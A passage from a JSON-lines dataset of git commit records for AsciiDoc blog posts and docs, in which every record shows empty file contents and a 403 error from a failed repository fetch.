2017-09-01-E-C2-Spring-Boot-L-I-N-E-Bot.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2017-09-01-E-C2-Spring-Boot-L-I-N-E-Bot.adoc","new_file":"_posts\/2017-09-01-E-C2-Spring-Boot-L-I-N-E-Bot.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"a82c5b11a98f4c5e647524ea3761023be1665889","subject":"update info on updating\/deleting tags","message":"update info on updating\/deleting tags\n","repos":"jsanda\/hawkular.github.io,jsanda\/hawkular.github.io,jsanda\/hawkular.github.io,jsanda\/hawkular.github.io","old_file":"src\/main\/jbake\/content\/docs\/components\/metrics\/index.adoc","new_file":"src\/main\/jbake\/content\/docs\/components\/metrics\/index.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/jsanda\/hawkular.github.io.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"3ff01105639b10b88722ce07a44b4431a12b913b","subject":"Update 2010-12-8-Recenberg-15th-success-rule-applied-to-lif.adoc","message":"Update 2010-12-8-Recenberg-15th-success-rule-applied-to-lif.adoc","repos":"raghakot\/raghakot.github.io,raghakot\/raghakot.github.io,raghakot\/raghakot.github.io,raghakot\/raghakot.github.io","old_file":"_posts\/2010-12-8-Recenberg-15th-success-rule-applied-to-lif.adoc","new_file":"_posts\/2010-12-8-Recenberg-15th-success-rule-applied-to-lif.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/raghakot\/raghakot.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"c831ccf51a8d224e87326f15c89050442e0f315a","subject":"y2b create post The Essential Phone Is Back!","message":"y2b create post The Essential Phone Is Back!","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2018-02-15-The%20Essential%20Phone%20Is%20Back!.adoc","new_file":"_posts\/2018-02-15-The%20Essential%20Phone%20Is%20Back!.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 
'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"6d298833ee084b4612cfa8726e6a2da8fc20161d","subject":"Update 2018-06-25-Introduction-of-Computational-Complexity-2.adoc","message":"Update 2018-06-25-Introduction-of-Computational-Complexity-2.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2018-06-25-Introduction-of-Computational-Complexity-2.adoc","new_file":"_posts\/2018-06-25-Introduction-of-Computational-Complexity-2.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"65a4fbaf5289fc6d8d4e8ee9b74447b130f7897d","subject":"Update 2016-01-06-Introducing-the-New-bGC2-Site.adoc","message":"Update 2016-01-06-Introducing-the-New-bGC2-Site.adoc","repos":"blackGirlsCode\/blog,blackGirlsCode\/blog,blackGirlsCode\/blog","old_file":"_posts\/2016-01-06-Introducing-the-New-bGC2-Site.adoc","new_file":"_posts\/2016-01-06-Introducing-the-New-bGC2-Site.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/blackGirlsCode\/blog.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"696a187c89e5f8dcdad20d4c6879c12eeb1c87b2","subject":"Update 2016-10-10-Computer-Science-Linked-Lists.adoc","message":"Update 2016-10-10-Computer-Science-Linked-Lists.adoc","repos":"setupminimal\/blog,setupminimal\/blog,setupminimal\/blog,setupminimal\/blog","old_file":"_posts\/2016-10-10-Computer-Science-Linked-Lists.adoc","new_file":"_posts\/2016-10-10-Computer-Science-Linked-Lists.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/setupminimal\/blog.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"9247d8018603a15f5498502417fd4dc5d4f1c39f","subject":"Update 2016-12-08-Nog-lossere-koppeling-met-CDI.adoc","message":"Update 2016-12-08-Nog-lossere-koppeling-met-CDI.adoc","repos":"topicusonderwijs\/topicusonderwijs.github.io,topicusonderwijs\/topicusonderwijs.github.io,topicusonderwijs\/topicusonderwijs.github.io,topicusonderwijs\/topicusonderwijs.github.io","old_file":"_posts\/2016-12-08-Nog-lossere-koppeling-met-CDI.adoc","new_file":"_posts\/2016-12-08-Nog-lossere-koppeling-met-CDI.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/topicusonderwijs\/topicusonderwijs.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"9316927278b66b2b1035fdb4c3430a51883bb89d","subject":"Update 2016-12-30-Contrsuct-backdoor-for-RSA-DH.adoc","message":"Update 2016-12-30-Contrsuct-backdoor-for-RSA-DH.adoc","repos":"cothan\/cothan.github.io,cothan\/cothan.github.io,cothan\/cothan.github.io,cothan\/cothan.github.io,cothan\/cothan.github.io","old_file":"_posts\/2016-12-30-Contrsuct-backdoor-for-RSA-DH.adoc","new_file":"_posts\/2016-12-30-Contrsuct-backdoor-for-RSA-DH.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/cothan\/cothan.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} 
{"commit":"34a67b485ad5fc93218d807df7d8a89b4372fe32","subject":"Update 2017-05-12-Phantom-J-S-on-Raspberry-Pi-3.adoc","message":"Update 2017-05-12-Phantom-J-S-on-Raspberry-Pi-3.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2017-05-12-Phantom-J-S-on-Raspberry-Pi-3.adoc","new_file":"_posts\/2017-05-12-Phantom-J-S-on-Raspberry-Pi-3.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"f6d028c8372cd11d607311fed09ced8b9e515443","subject":"Update 2017-05-28-what-can-you-see-web-analytic.adoc","message":"Update 2017-05-28-what-can-you-see-web-analytic.adoc","repos":"dsp25no\/blog.dsp25no.ru,dsp25no\/blog.dsp25no.ru,dsp25no\/blog.dsp25no.ru,dsp25no\/blog.dsp25no.ru","old_file":"_posts\/2017-05-28-what-can-you-see-web-analytic.adoc","new_file":"_posts\/2017-05-28-what-can-you-see-web-analytic.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/dsp25no\/blog.dsp25no.ru.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"abe9db4a3c8c2d3d17c073ddf10da2c75ef26ace","subject":"y2b create post Quick Update","message":"y2b create post Quick Update","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2012-01-09-Quick-Update.adoc","new_file":"_posts\/2012-01-09-Quick-Update.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"6cd676f5cc6d3a7d16ec519d31ad3013408759b3","subject":"Update 2017-01-21-Swap-Numbers.adoc","message":"Update 2017-01-21-Swap-Numbers.adoc","repos":"faldah\/faldah.github.io,faldah\/faldah.github.io,faldah\/faldah.github.io,faldah\/faldah.github.io","old_file":"_posts\/2017-01-21-Swap-Numbers.adoc","new_file":"_posts\/2017-01-21-Swap-Numbers.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/faldah\/faldah.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"68c78a5e67b4f37fb07ac7e8f58d01bb9b06c76f","subject":"Update 2017-05-12-picture-book.adoc","message":"Update 2017-05-12-picture-book.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2017-05-12-picture-book.adoc","new_file":"_posts\/2017-05-12-picture-book.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"4636a997aeb31cac17c4c376cc9a4d7cd117b2ca","subject":"Update 2017-08-17-Magic-Mirror.adoc","message":"Update 
2017-08-17-Magic-Mirror.adoc","repos":"pamasse\/pamasse.github.io,pamasse\/pamasse.github.io,pamasse\/pamasse.github.io,pamasse\/pamasse.github.io","old_file":"_posts\/2017-08-17-Magic-Mirror.adoc","new_file":"_posts\/2017-08-17-Magic-Mirror.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/pamasse\/pamasse.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"406490ad41055dda93c10d3d461f0a49ee86ce9d","subject":"Renamed '_posts\/2019-01-31-Java-Quiz.adoc' to '_posts\/2019-01-31-Java-Puzzles.adoc'","message":"Renamed '_posts\/2019-01-31-Java-Quiz.adoc' to '_posts\/2019-01-31-Java-Puzzles.adoc'","repos":"Vanilla-Java\/vanilla-java.github.io,Vanilla-Java\/vanilla-java.github.io,Vanilla-Java\/vanilla-java.github.io,Vanilla-Java\/vanilla-java.github.io","old_file":"_posts\/2019-01-31-Java-Puzzles.adoc","new_file":"_posts\/2019-01-31-Java-Puzzles.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/Vanilla-Java\/vanilla-java.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"2bfed51338b6240ee03ad3f64bbd6538ab98af2e","subject":"Publish 1993-8-11-commoncommonfunctionphp-Hubpress-blog-usedcommonphp.adoc","message":"Publish 1993-8-11-commoncommonfunctionphp-Hubpress-blog-usedcommonphp.adoc","repos":"oppemism\/oppemism.github.io,oppemism\/oppemism.github.io,oppemism\/oppemism.github.io,oppemism\/oppemism.github.io","old_file":"1993-8-11-commoncommonfunctionphp-Hubpress-blog-usedcommonphp.adoc","new_file":"1993-8-11-commoncommonfunctionphp-Hubpress-blog-usedcommonphp.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/oppemism\/oppemism.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"e5fd1d6d2004654a7928de359cbeda615724ecaa","subject":"trex cons","message":"trex cons\n","repos":"dimagol\/trex-core,dimagol\/trex-core,kisel\/trex-core,kisel\/trex-core,kisel\/trex-core,kisel\/trex-core,kisel\/trex-core,dimagol\/trex-core,dimagol\/trex-core,dimagol\/trex-core,kisel\/trex-core,dimagol\/trex-core","old_file":"trex_console.asciidoc","new_file":"trex_console.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/kisel\/trex-core.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"3ec90468c3ab65d60571d3b266479ba8d2f0313d","subject":"y2b create post I bet your pillow can't do this...","message":"y2b create post I bet your pillow can't do this...","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2016-11-16-I-bet-your-pillow-cant-do-this.adoc","new_file":"_posts\/2016-11-16-I-bet-your-pillow-cant-do-this.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"8f79d1281cbe9fac0322552e92bc9cd0b8b9ee3b","subject":"Update 2017-01-15-DES-MENSCHEN-ARBEIT-UND-GEWALT.adoc","message":"Update 
2017-01-15-DES-MENSCHEN-ARBEIT-UND-GEWALT.adoc","repos":"backemulus\/backemulus.github.io,backemulus\/backemulus.github.io,backemulus\/backemulus.github.io,backemulus\/backemulus.github.io","old_file":"_posts\/2017-01-15-DES-MENSCHEN-ARBEIT-UND-GEWALT.adoc","new_file":"_posts\/2017-01-15-DES-MENSCHEN-ARBEIT-UND-GEWALT.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/backemulus\/backemulus.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"78fd9716273557c3adec1f85897cec1f87fc7280","subject":"Update 2017-03-25-Drop-handkerchief-with-M-E-M-E.adoc","message":"Update 2017-03-25-Drop-handkerchief-with-M-E-M-E.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2017-03-25-Drop-handkerchief-with-M-E-M-E.adoc","new_file":"_posts\/2017-03-25-Drop-handkerchief-with-M-E-M-E.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"f86ed28a26cd714d21bc29530cb2dd17b4e75385","subject":"Update 2017-09-22-Visualizing-Installer-Workflow.adoc","message":"Update 2017-09-22-Visualizing-Installer-Workflow.adoc","repos":"scottellis64\/scottellis64.github.io,scottellis64\/scottellis64.github.io,scottellis64\/scottellis64.github.io,scottellis64\/scottellis64.github.io","old_file":"_posts\/2017-09-22-Visualizing-Installer-Workflow.adoc","new_file":"_posts\/2017-09-22-Visualizing-Installer-Workflow.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/scottellis64\/scottellis64.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"e9f1f470ddd917963bde996f79be32f883125a47","subject":"Update 2017-11-08-api-blueprint.adoc","message":"Update 2017-11-08-api-blueprint.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2017-11-08-api-blueprint.adoc","new_file":"_posts\/2017-11-08-api-blueprint.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"8daa9cb5072f83400f7d0ad8545a6a42f8ded825","subject":"Renamed '_posts\/2018-01-09-Blog-Home.adoc' to '_posts\/2018-01-09-Blog-And-Home.adoc'","message":"Renamed '_posts\/2018-01-09-Blog-Home.adoc' to '_posts\/2018-01-09-Blog-And-Home.adoc'","repos":"lonelee-kirsi\/lonelee-kirsi.github.io,lonelee-kirsi\/lonelee-kirsi.github.io,lonelee-kirsi\/lonelee-kirsi.github.io,lonelee-kirsi\/lonelee-kirsi.github.io","old_file":"_posts\/2018-01-09-Blog-And-Home.adoc","new_file":"_posts\/2018-01-09-Blog-And-Home.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/lonelee-kirsi\/lonelee-kirsi.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"fb50e9620ebc71e0a362219a43ed58be7bbe3320","subject":"Update 2018-10-14-perspective-1.adoc","message":"Update 
2018-10-14-perspective-1.adoc","repos":"scriptindex\/scriptindex.github.io,scriptindex\/scriptindex.github.io,scriptindex\/scriptindex.github.io,scriptindex\/scriptindex.github.io","old_file":"_posts\/2018-10-14-perspective-1.adoc","new_file":"_posts\/2018-10-14-perspective-1.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/scriptindex\/scriptindex.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"5f9eb7a649b960c9ce920655abbab7eae91c2ccb","subject":"Update 2017-02-20-Lombok.adoc","message":"Update 2017-02-20-Lombok.adoc","repos":"ovo-6\/ovo-6.github.io,ovo-6\/ovo-6.github.io,ovo-6\/ovo-6.github.io,ovo-6\/ovo-6.github.io","old_file":"_posts\/2017-02-20-Lombok.adoc","new_file":"_posts\/2017-02-20-Lombok.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/ovo-6\/ovo-6.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"11767ad16a79a01aa57177afb31d86e5f11b5c82","subject":"Avances","message":"Avances\n","repos":"isidorotrevino\/curso_pocgrails,isidorotrevino\/curso_pocgrails,isidorotrevino\/curso_pocgrails,isidorotrevino\/curso_pocgrails","old_file":"presentacion\/documentacion\/dia2.adoc","new_file":"presentacion\/documentacion\/dia2.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/isidorotrevino\/curso_pocgrails.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"2ad6b5b689046bb204bafa1ed60d60bccc6c1be0","subject":"Update 2016-03-18-Synchronizing-Living-Colors-gen2-and-Hue-bridge-20.adoc","message":"Update 2016-03-18-Synchronizing-Living-Colors-gen2-and-Hue-bridge-20.adoc","repos":"anwfr\/blog.anw.fr,anwfr\/blog.anw.fr,anwfr\/blog.anw.fr,anwfr\/blog.anw.fr","old_file":"_posts\/2016-03-18-Synchronizing-Living-Colors-gen2-and-Hue-bridge-20.adoc","new_file":"_posts\/2016-03-18-Synchronizing-Living-Colors-gen2-and-Hue-bridge-20.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/anwfr\/blog.anw.fr.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"269b22839fcaa551ba2542cfc294e2cdab1b6c15","subject":"Update 2016-03-28-AsciiDoc-to-GitHub-Pages-with-Travis-CI-and-Docker.adoc","message":"Update 2016-03-28-AsciiDoc-to-GitHub-Pages-with-Travis-CI-and-Docker.adoc","repos":"mgreau\/posts,mgreau\/posts,mgreau\/posts,mgreau\/posts","old_file":"_posts\/2016-03-28-AsciiDoc-to-GitHub-Pages-with-Travis-CI-and-Docker.adoc","new_file":"_posts\/2016-03-28-AsciiDoc-to-GitHub-Pages-with-Travis-CI-and-Docker.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/mgreau\/posts.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"76957d83313ecdba995ccb388f567a50e5139b84","subject":"Update 2015-10-18-Programatically-creating-Excel-reports-using-EPPlus.adoc","message":"Update 2015-10-18-Programatically-creating-Excel-reports-using-EPPlus.adoc","repos":"xmichaelx\/xmichaelx.github.io,xmichaelx\/xmichaelx.github.io","old_file":"_posts\/2015-10-18-Programatically-creating-Excel-reports-using-EPPlus.adoc","new_file":"_posts\/2015-10-18-Programatically-creating-Excel-reports-using-EPPlus.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable 
to access 'https:\/\/github.com\/xmichaelx\/xmichaelx.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"baf355eb99afd9e8281a6a83d0e84521b77ef3d4","subject":"Update 2016-05-24-Balisage-pre-conference-symposium-program-announced.adoc","message":"Update 2016-05-24-Balisage-pre-conference-symposium-program-announced.adoc","repos":"xquery\/xquery.github.io,xquery\/xquery.github.io,xquery\/xquery.github.io,xquery\/xquery.github.io","old_file":"_posts\/2016-05-24-Balisage-pre-conference-symposium-program-announced.adoc","new_file":"_posts\/2016-05-24-Balisage-pre-conference-symposium-program-announced.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/xquery\/xquery.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"eec53acad98e67c76c2235630ea421ba2128d98b","subject":"Update 2016-03-29-Conocido-Desconocido.adoc","message":"Update 2016-03-29-Conocido-Desconocido.adoc","repos":"camilo28\/camilo28.github.io,camilo28\/camilo28.github.io,camilo28\/camilo28.github.io,camilo28\/camilo28.github.io","old_file":"_posts\/2016-03-29-Conocido-Desconocido.adoc","new_file":"_posts\/2016-03-29-Conocido-Desconocido.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/camilo28\/camilo28.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"800e28458e84e9f5eda49c8b4fdedf6b0a9afd15","subject":"Update 2017-05-19-Network-construction.adoc","message":"Update 2017-05-19-Network-construction.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2017-05-19-Network-construction.adoc","new_file":"_posts\/2017-05-19-Network-construction.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"2bec9aebdaffe3e2f104cdd7d7757ccebbaace72","subject":"Update 2015-08-31-Un-Sensit-un-Rolling-Spider-et-Meteor-sont-dans-un-bateau.adoc","message":"Update 2015-08-31-Un-Sensit-un-Rolling-Spider-et-Meteor-sont-dans-un-bateau.adoc","repos":"anthonny\/personal-blog,anthonny\/personal-blog,anthonny\/personal-blog,anthonny\/personal-blog","old_file":"_posts\/2015-08-31-Un-Sensit-un-Rolling-Spider-et-Meteor-sont-dans-un-bateau.adoc","new_file":"_posts\/2015-08-31-Un-Sensit-un-Rolling-Spider-et-Meteor-sont-dans-un-bateau.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/anthonny\/personal-blog.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"9b7e754a7b131378d9a15a12a991bf63c335e56c","subject":"Update 2016-04-23-Its-Saturday.adoc","message":"Update 2016-04-23-Its-Saturday.adoc","repos":"2wce\/2wce.github.io,2wce\/2wce.github.io,2wce\/2wce.github.io,2wce\/2wce.github.io","old_file":"_posts\/2016-04-23-Its-Saturday.adoc","new_file":"_posts\/2016-04-23-Its-Saturday.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/2wce\/2wce.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} 
{"commit":"5254f0485e6d925600cd84d0ada5a46f2967c575","subject":"Update 2016-03-20-Rhume-incessant-mal-de-gorge-recurrent-nez-bouche.adoc","message":"Update 2016-03-20-Rhume-incessant-mal-de-gorge-recurrent-nez-bouche.adoc","repos":"anwfr\/blog.anw.fr,anwfr\/blog.anw.fr,anwfr\/blog.anw.fr,anwfr\/blog.anw.fr","old_file":"_posts\/2016-03-20-Rhume-incessant-mal-de-gorge-recurrent-nez-bouche.adoc","new_file":"_posts\/2016-03-20-Rhume-incessant-mal-de-gorge-recurrent-nez-bouche.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/anwfr\/blog.anw.fr.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"9958b155b3aca74a398ea248e77e6f4ad70b8bef","subject":"Update 2020-06-11-How-I-use-Meteor-Elm-Parcel-and-Tailwind-together.adoc","message":"Update 2020-06-11-How-I-use-Meteor-Elm-Parcel-and-Tailwind-together.adoc","repos":"anthonny\/personal-blog,anthonny\/personal-blog,anthonny\/personal-blog,anthonny\/personal-blog","old_file":"_posts\/2020-06-11-How-I-use-Meteor-Elm-Parcel-and-Tailwind-together.adoc","new_file":"_posts\/2020-06-11-How-I-use-Meteor-Elm-Parcel-and-Tailwind-together.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/anthonny\/personal-blog.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"4431f0adeb4af65b18b0025d349f9fb7231be8f4","subject":"Update 2016-03-18-Synchronizing-Living-Colors-gen2-remotes-Hue-and-bridge-20.adoc","message":"Update 2016-03-18-Synchronizing-Living-Colors-gen2-remotes-Hue-and-bridge-20.adoc","repos":"anwfr\/blog.anw.fr,anwfr\/blog.anw.fr,anwfr\/blog.anw.fr,anwfr\/blog.anw.fr","old_file":"_posts\/2016-03-18-Synchronizing-Living-Colors-gen2-remotes-Hue-and-bridge-20.adoc","new_file":"_posts\/2016-03-18-Synchronizing-Living-Colors-gen2-remotes-Hue-and-bridge-20.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/anwfr\/blog.anw.fr.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"24e322783039e413bec7849dde23d31e5b5b48b6","subject":"Update 2017-01-17-Persimmon-Rum-Porridge.adoc","message":"Update 2017-01-17-Persimmon-Rum-Porridge.adoc","repos":"zestyroxy\/zestyroxy.github.io,zestyroxy\/zestyroxy.github.io,zestyroxy\/zestyroxy.github.io,zestyroxy\/zestyroxy.github.io","old_file":"_posts\/2017-01-17-Persimmon-Rum-Porridge.adoc","new_file":"_posts\/2017-01-17-Persimmon-Rum-Porridge.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/zestyroxy\/zestyroxy.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"f3f983368d20ae5d2786ed937041b5d3e56fc7ed","subject":"Update 2016-04-03-etat-limite-personnalite-borderline.adoc","message":"Update 2016-04-03-etat-limite-personnalite-borderline.adoc","repos":"anwfr\/blog.anw.fr,anwfr\/blog.anw.fr,anwfr\/blog.anw.fr,anwfr\/blog.anw.fr","old_file":"_posts\/2016-04-03-etat-limite-personnalite-borderline.adoc","new_file":"_posts\/2016-04-03-etat-limite-personnalite-borderline.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/anwfr\/blog.anw.fr.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"9689f853bb4baf50d9b9b1a30b22ca8efe69b0d4","subject":"Update 
2016-03-02-Finding-Dory-characters-joining-Crush-at-Turtle-Talk-with-Crush-this-summer.adoc","message":"Update 2016-03-02-Finding-Dory-characters-joining-Crush-at-Turtle-Talk-with-Crush-this-summer.adoc","repos":"mouseguests\/mouseguests.github.io,mouseguests\/mouseguests.github.io,mouseguests\/mouseguests.github.io","old_file":"_posts\/2016-03-02-Finding-Dory-characters-joining-Crush-at-Turtle-Talk-with-Crush-this-summer.adoc","new_file":"_posts\/2016-03-02-Finding-Dory-characters-joining-Crush-at-Turtle-Talk-with-Crush-this-summer.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/mouseguests\/mouseguests.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"ed8210220b9f65d8c227bbf58cb4f01beb97d763","subject":"Update 2016-07-28-Potrzeba-matka-wynalazku.adoc","message":"Update 2016-07-28-Potrzeba-matka-wynalazku.adoc","repos":"pzmarzly\/pzmarzly.github.io,pzmarzly\/pzmarzly.github.io,pzmarzly\/g2zory,pzmarzly\/g2zory,pzmarzly\/pzmarzly.github.io,pzmarzly\/g2zory,pzmarzly\/pzmarzly.github.io,pzmarzly\/g2zory","old_file":"_posts\/2016-07-28-Potrzeba-matka-wynalazku.adoc","new_file":"_posts\/2016-07-28-Potrzeba-matka-wynalazku.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/pzmarzly\/pzmarzly.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"815b8bc0faed077daf8c99a8571199b504bdcfbe","subject":"Update 2015-02-24-Second-Post.adoc","message":"Update 2015-02-24-Second-Post.adoc","repos":"RaoUmer\/hubpress.io,RaoUmer\/hubpress.io,RaoUmer\/hubpress.io","old_file":"_posts\/2015-02-24-Second-Post.adoc","new_file":"_posts\/2015-02-24-Second-Post.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/RaoUmer\/hubpress.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} 